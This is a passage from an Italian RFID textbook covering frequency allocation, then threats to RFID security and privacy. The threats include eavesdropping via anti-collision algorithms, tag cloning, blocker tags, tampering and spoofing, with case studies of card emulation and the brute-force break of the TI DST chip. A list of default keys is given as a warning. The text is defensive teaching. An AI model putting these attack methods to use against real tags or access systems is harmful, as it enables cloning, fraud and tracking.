Nota dalla tab. B PNRF concernenti la banda 865 ÷ 870 MHz MHz.Comunque da aggiornare a norma delle 2006/804/CE (cfr. §VII.2.4) e2006/771/CE (cfr. §VII.2.5).

Tabella VII.13Allocazione italiana della banda UHF865 ÷ 870 MHz con riferimento alla

normativa europea.

2-parteVII.qxp:rfid 5-09-2008 11:01 Pagina 332

Page 319: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VII - ALLOCAZIONE IN FREQUENZA333

<110C>In accordo con la decisione della CEPT ERC/DEC/(01)04 lebande di frequenze 868,0-868,6 MHz, 868,7-869,2 MHz, 869,40-869,65 MHz e 869,7-870,0 MHz, nonché la banda di frequenze869,3-869,4 MHz, possono essere impiegate ad uso collettivo daapparati a corto raggio non destinati ad impieghi specifici, aventi lecaratteristiche tecniche della Raccomandazione CEPT ERC/REC70-03 (Annesso 1). Tali applicazioni rientrano negli scopi di cui aldPR 5 ottobre 2001, n. 447, articolo 6, comma 1, lettera q).

ESEMPI DI BANDE IN CUI SONO CONSENTITI SRD PER USO NON SPECIFICO

3.2.1 Banda UHF bassa (433 ÷ 435 MHz)

In Italia la banda è gestita dal Ministero della difesa per usi militari, coneccezione della banda 433,05 - 434,79 MHz gestita dal Ministero dellecomunicazioni e dedicata ai radioamatori.Tuttavia è possibile utilizzare sistemi SRD (Short Range Devices,

Apparati non destinati ad uso specifico) lavorando su frequenze appar-tenenti all’intervallo 433,050 ÷ 434,790 MHz come specificato nellaDecisione 2006/771/CE (cfr. § VII.2.5) che consente di operare nell’in-tervallo di frequenze 433,050 ÷ 434,790 MHz, con SRD aventi potenzalimitata a 10 mW, Duty Cycle fino al 10% ed esclusione delle applicazio-ni video.Ciò risulta sufficiente per applicazioni con TAG attivi e rende possibi-

le la lettura (in prossimità) dei TAG a Standard ISO 18000-7 impiegatinegli USA.

3.2.2 Banda 2,4 GHz (UHF alta)

Si tratta di una banda particolarmente affollata, perché prevede in Italiaradio LAN in libero uso (WiFi ed Hiperlan, oltre a Bluetooth, ZigBee edal futuro Wibree). È gestita dal Ministero Comunicazioni con l’eccezionedella sottobanda 2.450 ÷ 2.468 gestita dal Ministero Difesa.Tale banda, però, comprende anche un intervallo di frequenze allocato

a livello europeo per sistemi RFID (cfr §VII.2.3).

VII.3.2

2-parteVII.qxp:rfid 5-09-2008 11:01 Pagina 333

Page 320: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva334

Nella banda (oltre alla possibilità di impiego di TAG a standard WiFicome illustrato in §V.2) esistono prodotti commerciali RFID passivi edattivi, provenienti dagli Stati Uniti dove la banda dedicata ad applicazio-ni RFID è: 2.400 – 2.500 MHz. Alcuni sistemi con TAG attivi sono pro-dotti in Europa e già in commercio.Il recepimento della Decisione 2006/771/CE (cfr. §VII.2.5) consente di

operare nell’intervallo di frequenze 2.400 ÷ 2.483,5 MHz, con SRD apotenza limitata a 10 mW.Ciò risulta sufficiente per applicazioni con TAG attivi e rende possibile

la lettura in prossimità dei TAG a Standard ISO 18000-4.In Italia (ma anche in Europa) la banda 2.446 ÷ 2.454 MHz soffre delle

possibili interferenze con sistemi molto diffusi, quali Wireless LAN,Bluetooth, ecc. Le altre applicazioni previste in Italia sono attualmente:- WAS/R-LAN: 2.400÷2.483,5 MHz, 100 mW e.i.r.p (SRD-Annesso 3REC 70-03 e nota 158 tab B PNRF).

- Reti fisse analogiche per il trasporto di segnale audio.

3.2.3 Banda 5,8 GHz (SHF)

La banda 5,725 ÷ 5,805 GHz è allocata in Italia principalmente per dis-positivi in ausilio al traffico, (Telepass e simili) in accordo con la DecisioneERC (02)01.Anche in questo caso si potrebbe tener conto della Decisione ERC

(01)06 “Non-specific SRD operating in the frequency band 5725 – 5875”,che riporta lo stesso limite di potenza 25 mW e.i.r.p previsto dalla REC70-03 Ann. 1.Il recepimento della Decisione 2006/771/CE (cfr. §VII.2.5) consente

comunque di operare nell’intervallo di frequenze5.725 ÷ 5.875 MHz,con SRD a potenza limitata a 25 mW.

Nota sulla tab. B PNRF concernenti la banda 5,725 ÷ 5,875 GHz:194: In accordo con la decisione ERC/DEC/(02)01 della CEPT, fre-

quenze della banda 5.795-5.815 MHz possono essere impiegate aduso collettivo con statuto secondario da apparati a corto raggio ditipo telematico in ausilio al traffico, aventi le caratteristiche tecni-

2-parteVII.qxp:rfid 5-09-2008 11:01 Pagina 334

Page 321: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VII - ALLOCAZIONE IN FREQUENZA335

che della raccomandazione della CEPT ERC /REC 70-03(Annesso 5). Tali applicazioni rientrano negli scopi di cui al dPR 5ottobre 2001, n. 447, articolo 6 comma 1.

Nota sulla ERC Decision (02)01- designa, su base non esclusiva, le bande di frequenze 5,795-5,805

GHz per sistemi “Road Transport and Traffic Telematic (RTTT)”- la banda 5,795-5,805 GHz deve essere usata per sistemi “ initial

road-to-vehicle”, in particolare per sistemi di pedaggio stradale- Sistemi RTTT operanti in queste bande devono essere conformi

agli standard sviluppati dall’European TelecommunicationsStandards Institute (ETSI) per tali sistemi oppure a standard equi-valenti.

Un “celebre” esempio di applicazione nazionale riguarda il sistemaTelepass (5,795-5,815 GHz, e.i.r.p.2W, 8W - PNRF nota 194) utilizzatoper il pagamento automatico delle autostrade italiane. Le potenze, però,non corrispondono a quelle europee.Negli Stati Uniti, la banda dedicata ad applicazioni SRD e RFID appar-

tiene all’intervallo 5,850 – 5,925 GHz, disgiunto da quello europeo.

SPERIMENTAZIONI ULTRA WIDE BAND – BANDA 6 ÷ 8,5 GHZ

Accanto alle bande di frequenza citate in precedenza, utilizzate conmodulazioni tradizionali, si stanno facendo strada applicazioni con nuovitipi di modulazioni a dispersione di spettro su bande ultra larghe (UltraWide Band - UWB).Tra le bande di frequenza in cui viene disperso lo spettro ve ne posso-

no essere di già utilizzate da altre applicazioni, in quanto le tecnologieUWB applicate alle radiocomunicazioni di prossimità dovrebbero garan-tire la non interferenza e quindi una sorta di riuso delle frequenze pernuove applicazioni senza interferire con quelle esistenti (cfr. §V.1).La Federal Communications Commission statunitense ha, di recente,

autorizzato la produzione, con questa tecnologia, di dispositivi di comu-nicazione ad uso civile rientranti nella categoria degli SRD.

VII.3.3

2-parteVII.qxp:rfid 5-09-2008 11:01 Pagina 335

Page 322: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva336

L’autorizzazione è avvenuta sulla base della norma:- FCC Part 15 - Radio Frequency Devices; Subpart F - Ultra-WidebandOperation (che definisce le regole per sistemi di trasmissione operanticon tecnologia ultra-wideband senza necessità di licenza) (14/2/2002).

- FCC Part 15 - Radio Frequency Devices; Subpart C - IntentionalRadiators; Part 15.250 - Operation of wideband systems within theband 5,925-7,250 GHz (che definisce i livelli massimi di emissione,validi sia indoor che outdoor, per apparati operanti con tecnologiaultra-wideband nella banda indicata, che sembra quella preferita daipotenziali costruttori di RFID UWB).Questo segna una svolta nella regolamentazione e nel mercato wireless

negli Stati Uniti e prevedibilmente provocherà un “effetto domino” nelmondo intero.

Da parte sua l’ITU con il “Radiocommunication Study Group 1” harecepito l’argomento in due “Questions” ITU-R 226/1 e ITU-R 227/1. Aloro volta i due gruppi di lavoro hanno in gestazione quattro “Draft” diraccomandazioni:- Characteristics of ultra-wideband technology - che tratta le caratteristi-che generali della tecnologia UWB, nonché le liste di termini e defini-zioni.

- Framework for the introduction of devices using ultra-wideband tech-nology - che fornisce le linee guida per l’introduzione della tecnologia,riassumendo in appendice la normativa in USA, Europa e Giappone

- Impact of devices using ultra-wideband technology on systems opera-ting within radiocommunication services - elenca una rassegna deglistudi sull’impatto di apparati che operano in UWB con gli altri sistemidi radiocomunicazione, fornisce le linee guida per lo sviluppo di unanormativa a livello nazionale.

- Measurement techniques of ultra-wideband transmissions - elenca le tec-niche per effettuare misure sulle trasmissioni UWB, considerando sia l’ap-proccio nel dominio del tempo sia quello nel dominio della frequenza.

In Europa la CEPT ha definito le bande operative dei sistemi UWB:

2-parteVII.qxp:rfid 5-09-2008 11:01 Pagina 336

Page 323: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VII - ALLOCAZIONE IN FREQUENZA337

- 0-960 MHz (per la maggior parte degli apparati di classe 2).- 3,1-10,6 GHz (per la maggior parte degli apparati di classe 1).- sopra i 20 GHz (per radar di autoveicoli in tecnica UWB).Le apparecchiature radio e le apparecchiature terminali di telecomuni-

cazione che possono essere commercializzate e messe in servizio senzalimitazioni costituiscono una categoria, denominata “classe 1”; la “classe2”, invece, designa apparecchiature che richiedono, per essere commer-cializzate, il soddisfacimento di particolari requisiti regolamentari.

Inoltre l’ECC/CEPT ha approvato il 24 marzo 2006 la seguente:- “Decision” (ECC/DEC/(06)04) “on the harmonised conditions fordevices using Ultra-Wideband (UWB) technology in bands below 10.6GHz” [146].La decisione riguarda l’utilizzo della tecnologia UWB in Europa, sulla

base di principi di non interferenza (come avvenuto negli USA) ed è vin-colante per gli Stati membri.I principi di non interferenza con i servizi esistenti che occupano, con

modulazioni tradizionali, le varie bande interessate della emissioni UWB,sono definiti nel:- ECC/CEPT Report 64 (febbr. 2005) “The Protection Requirements ofRadiocommunications Systems below 10.6 GHz from generic UWBapplications” [164].La decisione ECC/DEC/(06)04 si occupa degli apparati il cui spettro

di emissione rimanga al di sotto dei 10,6 GHz, che operino senza neces-sità di licenza e rientrino nella categoria degli SRD (per usi quali commu-nications, measurement, location tracking, imaging, surveillance andmedical systems).La Decisione costituisce il “primo passo” verso un “regulatory packa-

ge” che coinvolgerà CEPT, UE ed ETSI, oltre, naturalmente, agli organi-smi competenti degli stati membri.Anche in questo caso, tra le varie bande definite, ve ne è una da 6 a 8,5

GHz quasi coincidente con quella americana e preferita dai costruttori diRFID UWB.Il livello massimo delle emissioni (–41,3 dBm/MHz - Maximum mean

2-parteVII.qxp:rfid 5-09-2008 11:01 Pagina 337

Page 324: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva338

e.i.r.p. density) per questa banda è sostanzialmente identico a quello ame-ricano, l’uso previsto, però, è solo indoor.In Europa, i primi apparati sperimentali sono già in circolazione, le

prospettive di uniformità con gli altri continenti sono buone, non sembra-no quindi essersi creati i presupposti per le incompatibilità che affliggonole applicazioni nella banda UHF.Non resta che attendere il completamento del processo di allocazione

delle frequenze e normalizzazione delle tecnologie, sperando che le appli-cazioni UWB offrano innovative prospettive di sviluppo per le applicazio-ni con TAG attivi.

2-parteVII.qxp:rfid 5-09-2008 11:01 Pagina 338

Page 325: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFIDFondamenti di una tecnologia silenziosamente pervasiva

PARTE VIII

SICUREZZA E PRIVACYNEI SISTEMI RFID

Paolo Talone, Giuseppe RussoFondazione Ugo Bordoni

Luca Carettoni, Stefano ZaneroSecure Network

Per il capitolo “Sigilli elettronici”Graziano Azzalin, Marcello BarboniJoint Research Centre of the European Commission,Institute for the Protection and Security of the Citizen

Questa parte è dedicata a problemi particolarmente dibattuti dall’opinione pubblicae di grande interesse per gli integratori di sistemi che devono evitare contenziosi checompromettano la diffusione dei servizi: si tratta delle problematiche di Sicurezza &Privacy nei sistemi RFID.Nel seguito vengono approfondite le principali tipologie di threat (attacchi alla sicu-rezza), le applicazioni pratiche delle tecniche di attacco ed i possibili provvedimentiche sono o potrebbero essere adottati.Una particolare attenzione viene dedicata alle problematiche di privacy, derivanti dal-l’acquisizione dei dati personali di utenti che, volontariamente o meno, siano in pos-sesso di TAG RFID.Vengono illustrati dettagli delle tecniche di sicurezza informatica quali la cifratura deidati con funzioni hash e firma elettronica, la mutua autenticazione tra TAG e Readere l’allestimento di un “canale sicuro” per la loro comunicazione.Infine un significativo capitolo viene dedicato alla problematica dei cosiddetti “sigillielettronici” che stanno acquistando un ruolo essenziale nella sicurezza dei trasporti.

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 339

Page 326: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID341

INCIPIT: GLI ALBORI DELLA SICUREZZA

La sicurezza nei sistemi RFID ha trascorso, come spesso accade, un perio-do pionieristico in cui le relative misure venivano attuate in modo empi-rico. Valga per tutte una celebre frase:“Applied Digital’s implantable chips do not employ cryptography as of yet.The system is nevertheless safe because its chips can only be read by the com-pany’s proprietary scanners”. (Scott Silverman, CEO of Applied Digital)La citazione riassume bene il modello “naif” di sicurezza adottato agli

albori d’uso della tecnologia RFID.Come tutti i campi della sicurezza hanno insegnato, tuttavia, questo

tipo di security through obscurity, o meglio, through incompatibility,viene meno non appena i protocolli e i sistemi diventano standard ocomunque noti nella loro struttura. Oggi, con la diffusione degli standardISO, dei lettori multi-tag e multiprotocollo disponibili per poche centi-naia di euro, evidentemente questo tipo di assunzioni non è più valido (semai lo è stato).

MINACCE ALLA SICUREZZA (THREAT) NEI SISTEMI RFIDNella parte I di questo volume (cfr. §I.1.8), si è brevemente accennato alleproblematiche di sicurezza che sorgono con la diffusione dei sistemiRFID. Per affrontare in maniera più approfondita tale tematica è oranecessario costruire modelli delle possibili minacce (threat) portate daaggressori informatici a sistemi RFID.Le principali tipologie di threat sono relative all’acquisizione o l’alte-

razione illecita dei dati contenuti nei TAG RFID. Questo può avvenire siaattraverso interrogazioni fraudolente degli RFID con Reader non autoriz-zati sia mediante intercettazione, tramite ricevitori radio, durante una let-tura degli stessi da parte di un Reader autorizzato.In tale ambito si possono individuare gli attacchi tesi alla violazione

della privacy (letture non autorizzate & tracciamento illecito), le intercet-tazioni, le clonazioni e l’alterazione dei dati nei TAG.Altre tipologie di threat, relative ad azioni differenti, sono relative a:

- Il rifiuto del servizio da parte dei TAG (denial of service).

VIII.1

VIII.2

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 341

Page 327: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva342

- Tag Tampering: modifica diretta sulle informazioni contenute neiTAG.

- Data Spoofing: alterazione della comunicazione tra Reader e TAG.Declinata nei vari tipi di attacco (Data Corruption, Data Modification,Data Insertion, Man-in-the-Middle-Attack).

- La diffusione di codice maligno nei sistemi di back-end (Malware).La Figura VIII.1 riporta una rappresentazione grafica delle tipologie di

threat le cui principali caratteristiche saranno descritte nei paragrafi cheseguono identificando inoltre le possibili contromisure ed illustrandoqualche caso concreto d’interesse.

SNIFFING (INTERCETTAZIONI, ANALISI E CLONAZIONE)In questo paragrafo si generalizza la tematica dell’acquisizione illecita deidati contenuti nei TAG considerando, da un lato le problematiche di inter-cettazione fraudolenta di letture di per se “autorizzate”, dall’altro latoestendendo il tema delle letture non autorizzate anche alla clonazione.

Questo paragrafo illustra le più celebri e temute tipologie di attacco allasicurezza; nei paragrafi successivi verranno trattate altre tipologie di attac-co, quali Denial of Service, Spoofing e Malware, meno diffuse ma non perquesto da trascurare.

Figura VIII.1Tipologie di threat

VIII.2.1

339-402.qxp:RFID 9-09-2008 11:24 Pagina 342

Page 328: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID343

2.1.1 Intercettazioni (Eavesdropping)

Essendo lo scambio dei dati tra TAG e Reader una comunicazione radio,le intercettazioni assumono particolare importanza. Queste possono esse-re operate sia mediante intercettazioni con ricevitori ad alta sensibilità elungo raggio (es. intercettazione dei codici – Skimming – di antifurti,sistemi di pagamento, etc.), sia occultando un Reader lungo la linea diproduzione, sia utilizzando un dispositivo portatile. In questi ultimi casila potenza emessa dal Reader dell’aggressore può essere anche moltosuperiore a quella consentita.Per operare le intercettazioni, l’aggressore usa, ovviamente, un ricevi-

tore ed un’antenna. Il primo problema da risolvere sarà quindi la ricezio-ne dei segnali, mentre il secondo problema sarà interpretare (decodifica-re) il significato dei segnali medesimi.La decodifica sarà un problema se la trasmissione è cifrata (cfr. §

VIII.5), altrimenti la domanda principale sarà quanto deve essere vicinol’aggressore per ricevere un segnale RF utilizzabile, visto che gli apparatioperano generalmente in prossimità. Naturalmente non è possibile forni-re una risposta univoca, ma solo un elenco (forzatamente incompleto) difattori da tenere in conto:

• Rapporti potenza/sensibilità- Potenza emessa dall’apparato sotto intercettazione.- Sensibilità e capacità di decodifica del ricevitore dell’aggressore (chepuò essere più alta di quella dei comuni Reader, consentendo inter-cettazioni a distanze maggiori di quelle operative degli apparati com-merciali).

• Fattori ambientali- Caratteristiche del campo RF emesso dall’apparato sotto intercetta-zione (geometria dell’antenna, effetto schermante dei contenitori odel circuito stampato del TAG).

- Caratteristiche dell’ambiente (presenza di muri o masse metalliche,livello di rumore di fondo, ecc.).

- Caratteristiche dell’antenna dell’aggressore (geometria dell’antenna,libertà di movimento della medesima, ecc.).

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 343

Page 329: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva344

• Modo di operare- Intercettazione del segnale del Reader.- Intercettazione del segnale del TAG.- Interrogazione diretta dei TAG.Per quanto esposto è facile dedurre che i TAG attivi siano più esposti

alle intercettazioni di quelli passivi, generalmente più difficili da intercet-tare in quanto operano con un minimo campo EM (backscatter o accop-piamento magnetico).A questo proposito va ricordato che, nei sistemi con TAG passivi di

prima generazione, a volte il Reader “ripete” a scopo di verifica (trasmet-tendolo ad alta potenza), l’EPC ricevuto dal TAG. Questo vanifica il van-taggio contro le intercettazioni dei TAG passivi. Il problema viene supe-rato, come si vedrà, nei TAG passivi Gen2.Comunque le misure efficaci contro le intercettazioni sono essenzial-

mente due:• Minimizzazione della propagazione “inutile” dei segnali radio.• Allestimento di un “canale sicuro” (cfr. §VIII.5.3).Una insidiosa vulnerabilità nasce anche dallo sfruttamento dei punti

deboli degli algoritmi anti-collisione. Come già citato (cfr. §III.3.2) iReader utilizzano questi algoritmi per evitare di essere “accecati” darisposte multiple dei TAG. Spesso l’algoritmo utilizzato è quello “binarytree” nel quale il Reader interroga i TAG, chiedendo dapprima se vi sianoTAG il cui ID inizi con 0, in seguito 1, poi a seconda delle risposte esplo-ra il secondo bit, il terzo, eccetera.Il problema nasce dal fatto che il Reader trasmette con una potenza

molto più alta di quella dei TAG, e ascoltando la sequenza del “binarytree” un aggressore può facilmente dedurre i codici dei TAG pur senzaintercettarli direttamente.In altri termini: attraverso la comunicazione Reader => TAG (canale

forward) ad alta potenza e facilmente intercettabile, si scoprono le infor-mazioni della comunicazione TAG => Reader (canale backward) a bassapotenza e difficilmente intercettabile.L’aggressore quindi non vede le risposte del TAG, ma le interrogazioni

del Reader svelano lo stato della ricerca binaria anche a lunga distanza.

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 344

Page 330: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID345

Pertanto, anche TAG che operano a cortissimo raggio (e consideratiper questo immuni da problematiche di intercettazione) potrebbero esse-re invece vulnerabili sfruttando l’algoritmo anticollisione.

2.1.2 Clonazione nei TAG

Altre essenziali problematiche di sicurezza riguardano le duplicazioni nonautorizzate (clonazione) dei TAG RFID. Il punto di partenza è sempre lalettura arbitraria del TAG. Se si riesce ad effettuare la lettura integrale delTAG, anche in presenza di dati criptati, è possibile acquistare TAG simi-li e scriverli con i dati “autentici” (copiati), creando quindi la possibilitàdi contraffazione di prodotti che si suppone siano protetti da TAG.Questa è una problematica fondamentale per i TAG contenuti nelle cartedi accesso o nei sistemi di pagamento senza contatto, così come per i pas-saporti RFID e le card di identificazione; ma anche per semplici articolidi consumo protetti da marchi di origine, che possono essere sostituiti damerce contraffatta.Alcuni TAG, in particolare quelli “scrivibili”, possono essere clonati

(copiati) ma anche ri-etichettati (modificati), solitamente con gli stessi let-tori/scrittori di uso comune. Altri TAG di sola lettura vengono invecevenduti come “unici”: in altre parole il costruttore garantisce che nonvenderà un altro TAG con lo stesso codice. A parte il ruolo “fiduciario”(trusted authority) che il costruttore acquisisce in questo frangente, anchetali TAG possono essere clonati, se si limitano ad enunciare la propriaidentità senza autenticazione alcuna e se non è disponibile in tempo realela verifica attiva dell’identità dichiarata.L’aspetto più conosciuto di questi attacchi è la falsificazione delle

merci. Ma anche al di là di tale aspetto, è evidente il potenziale danno cheun malintenzionato potrebbe causare, ad esempio clonando delle etichet-te usate per la gestione di magazzini o processi produttivi.

Le possibili difese

Ovviamente, la prima difesa contro la clonazione è la riservatezza, pertan-to tutte le misure di protezione elencate in § VIII.4 sono da considerarsiutili. Tuttavia, l'unico vero ostacolo alla clonazione è qualche forma di

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 345

Page 331: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva346

autenticazione. Esistono metodi di autenticazione attiva (mediante proto-colli crittografici, cfr. §VIII.5.2) o passiva (mediante la firma digitale deidati sul TAG, cfr. §VIII.5.1). L’autenticazione attiva richiede TAG costo-si e complessi e in generale non viene utilizzata nella applicazioni “openloop” (TAG a perdere) benché sia l’unica in grado di contrastare la clo-nazione. L’autenticazione passiva, più usata, non contrasta la clonazione (idati possono venire copiati assieme alla firma) ma consente di evitaremodifiche non autorizzate dei dati sul chip.A parte l’autenticazione attiva, l’unica contromisura per la clonazione

o la manomissione di etichette è un approccio di tipo anomaly detectionin cui vengono identificati usi anomali delle etichette (per es. l’utilizzocontemporaneo di due badge per aprire porte in edifici distanti tra loro ola presenza di un medesimo articolo in due punti vendita).Un accorgimento importante, anche se lapalissiano, è quello di non

usare le chiavi di default, mostrate nei kit di sviluppo crittografici (adesempio A0 A1 A2 A3 A4 A5 oppure FF FF FF FF FF FF) o altre chiavidi derivazione banale.Un caso sintomatico è quello del passaporto inglese, realizzato (come

quello americano e molti altri) sulle specifiche emesse dall’ICAO(International Civil Aviation Organisation) nel 2003.Per prevenire intercettazioni, la sicurezza dei dati personali contenuti

nel TAG passivo associato al passaporto viene affidata ad un algoritmo dicrittografia simmetrica giudicato particolarmente sicuro, il 3DES. Peccatoche la chiave dell’algoritmo sia ricavata dal numero del passaporto stesso,dalla data di nascita del possessore e dalla data di scadenza del medesi-mo passaporto.La cosa è stata giudicata come installare una porta blindata e mettere

la chiave sotto lo zerbino!!Si hanno anche notizie di attacchi condotti contro passaporti tedeschi

che hanno portato alla clonazione dei passaporti medesimi e della possi-bile identificazione delle nazionalità nei passaporti irlandesi.

Case study

Il primo caso di cui si è avuta notizia http://web.mit.edu/keithw/Public

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 346

Page 332: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID347

/MIT-Card-Vulnerabilities-March31.pdf, in data marzo 2004, è relati-vo alla clonazione di un chip “pseudo univoco” (224 bit di cui solo 32variano da carta a carta) è quello delle proximity card in uso al MITper controllare l'accesso agli edifici (tecnologia a 125 kHz). Mandel,Roach e Winstein hanno costruito in 2 settimane e spendendo $30 unemulatore di proximity card perfettamente funzionante e di piccoledimensioni.Gli stessi esperti hanno dimostrato di poter “rompere” alcuni algorit-

mi di “cifratura” dei dati particolarmente deboli (sviluppati daFlexSecure).

Ma il caso più famoso in questosenso è la “rottura” del chip TexasInstruments DST, un TAG RFIDcrittografico, usato in numerosisistemi reali (nei “car immobili-zer” della Ford ad esempio, maanche ExxonMobil SpeedPass,una etichetta RFID per pagarerapidamente il rifornimento dicarburante).Il chip implementa un algoritmo

di autenticazione proprietario ditipo challenge-response (cfr. §

VIII.5.2.1) con chiave da 40 bit. Il chip, come è evidente già da quantoappena detto, presenta due problemi fondamentali: la chiave è moltocorta (per la potenza di calcolo limitata) e l’algoritmo è proprietario(quindi risulta impossibile assicurarne l’affidabilità). Infatti, ricercatoridella John Hopkins University e di RSA Security hanno costruito un siste-ma “a forza bruta” con 16 FPGA in parallelo che è in grado di replicarela chiave del sistema osservando un gran numero di scambi challen-ge/response dei sistemi sotto attacco. Durante una dimostrazione, hannorotto con successo 5 chiavi in meno di 2 ore.

Figura VIII.2Emulatore di proximity card

Figura VIII.3Car Immobilizer

Figura VIII.4“FPGA in parallelo per la rottura” del chip

Texas Instruments DST

Figura VIII.5“Sistema per la rottura” del chip

Texas Instruments DST

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 347

Page 333: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva348

DENIAL OF SERVICE (RIFIUTO DEL SERVIZIO)

Questa tipologia di threat riguarda il rifiuto dei TAG di fornire servizio,ovvero di rispondere alle interrogazioni dei Reader.I TAG, come si è già accennato, possono essere distrutti, rimossi, fisica-

mente schermati (cfr. §VIII.3), in alcuni casi riprogrammati e cancellati.E’ poi facilmente immaginabile che anche i Reader possano essere dis-

turbati in radiofrequenza.Sono quindi possibili innumerevoli scenari d’attacco: la distruzione,

rimozione o riprogrammazione di TAG, con conseguente interruzione orallentamento operativo dei sistemi; oppure la schermatura (cfr. §VIII.3)o il disturbo in radiofrequenza per nascondere un TAG (ad es. quello dimerce rubata).Infine un’ulteriore tipologia di attacco, particolarmente insidiosa, è

quella che sfrutta le modalità di funzionamento degli algoritmi anticolli-sione (cfr. §VIII.2.2.1).

2.2.1 Blocker TAG

Come detto in precedenza, una insidiosa vulnerabilità nasce anche qui dal-l’uso degli algoritmi anti-collisione. Se infatti un TAG con funzione “bloc-cante” decide di rispondere affermativamente a ogni domanda del Reader,farà sembrare che siano presenti “tutti i TAG possibili”, rendendo l’ope-razione di lettura estremamente lunga e complessa. Può inoltre essereusato selettivamente per accecare la lettura solo di determinati TAG.Su questo principio ad esempio si basa, in parte, il progetto RFID

Guardian già citato (www.rfidguardian.org).In sintesi si tratta di un dispositivo portatile per difendere la privacy

degli utenti, che presenta le seguenti caratteristiche:• Dimensioni di un palmare, alimentazione tramite batterie• Può bloccare o modificare la trasmissione Reader<==>TAG• Blocker TAG: risponde sia 0 sia 1 qualunque sia l'interrogazione- Fa sembrare che siano presenti “tutti” i TAG possibili- Fa diventare l’operazione di lettura lunghissima- Può essere usato selettivamente (“acceca” solo i TAG che comincia-no con “10” ad esempio)

VIII.2.2

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 348

Page 334: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID349

- Può presentarsi come un normale TAG, anche se si tratta di unapparato attivo.

TAG TAMPERING

“Tampering” dovrebbe assumere il significato di “Modifica non autoriz-zata delle informazioni (in memoria)” ricordando che l’origine del nome(tampering) deriva dalla “Contaminazione o alterazione dolosa di prodot-ti (in particolare alimentari)”. Questo tipo di attacchi dovrebbe quindiessere mirato a modificare direttamente i dati presenti sulla memoria deiTAG.In tale ambito si collocano i rischi di sabotaggio industriale, ovvero

alterazione (cancellazione / modifica) dei dati dei TAG usando, ad esem-pio, Reader portatili.La possibilità di eseguire tale tipo di attacchi è strettamente legata alla

tipologia ed alle caratteristiche di protezione con cui le informazioni ven-

Figura VIII.7Circuiteria del dispositivo RFID Guardian

VIII.2.3

Figura VIII.6Schema a blocchi del dispositivo

RFID Guardian

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 349

Page 335: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva350

gono scritte nel TAG. Il tampering è infatti favorito sia nel caso in cui ilTAG non implementi protezioni (password) che ne inibiscano la scrittu-ra, sia nel caso in cui i TAG contengano informazioni articolate sul pro-dotto (ad esempio codice EPC, date di scadenza o composizione), il tuttoin chiaro.Anche i possibili effetti causati da queste azioni sono legati alla tipolo-

gia delle informazioni riportate sui TAG ed al grado di integrazione deisistemi, potendo tali informazioni essere costituite da codici di accesso abanche dati riservate ed anch’esse protette.Conseguentemente l’opportuna limitazione dei dati memorizzati nei

TAG e l’applicazione delle più idonee tecniche crittografiche e di sicurez-za, tra quelle descritte nel §VIII.5, per proteggere i dati scritti, costituisco-no gli approcci fondamentali per contrastare tale tipo di attacchi.

DATA SPOOFING

“Spoofing” dovrebbe significare: “Attacco mirato a far credere il falso, inparticolare alla contraffazione di identità per mezzo della falsificazione didati trasmessi(del TAG o del Reader)”;Questo tipo di attacchi sono quindi mirati a modificare i dati in trans-

ito, generalmente nella comunicazione TAG => Reader. L’attacco puòvenir declinato in varie modalità.

2.4.1 Data Corruption

Nell’attacco di “Data Corruption”, l’aggressore tenta di modificare i datiin transito in modo che vengano ricevuti alterati. L’alterazione però, èintesa solo come disturbo della comunicazione, non essendo l’aggressorein grado di interpretare i dati ed alterarli in modo da farli apparire comeuna falsa informazione; qualora sia possibile correlare dati ed informazio-ni il rischio di modifica assume un profilo differente.Il disturbo viene in genere realizzato trasmettendo a tempo debito e

nelle frequenze corrette. Il tempo debito può essere calcolato dall’hackerattraverso lo studio del sistema di modulazione e codifica del sistemasotto attacco.

VIII.2.4

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 350

Page 336: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID351

